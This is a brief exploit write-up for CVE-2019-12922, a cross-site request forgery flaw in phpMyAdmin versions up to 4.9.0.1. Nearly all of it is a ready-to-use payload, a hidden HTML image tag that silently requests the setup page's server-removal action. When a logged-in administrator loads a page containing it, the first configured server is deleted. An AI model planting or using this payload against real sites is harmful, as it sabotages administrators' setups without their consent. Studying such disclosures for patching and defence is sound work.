CVE-ID: CVE-2019-12922

phpMyAdmin <= 4.9.0.1

Exploit CSRF – Deleting main server


Deleting Server 1

<img src=" http://server/phpmyadmin/setup/index.php?page=servers&mode=remove&id=1" style="display:none;" />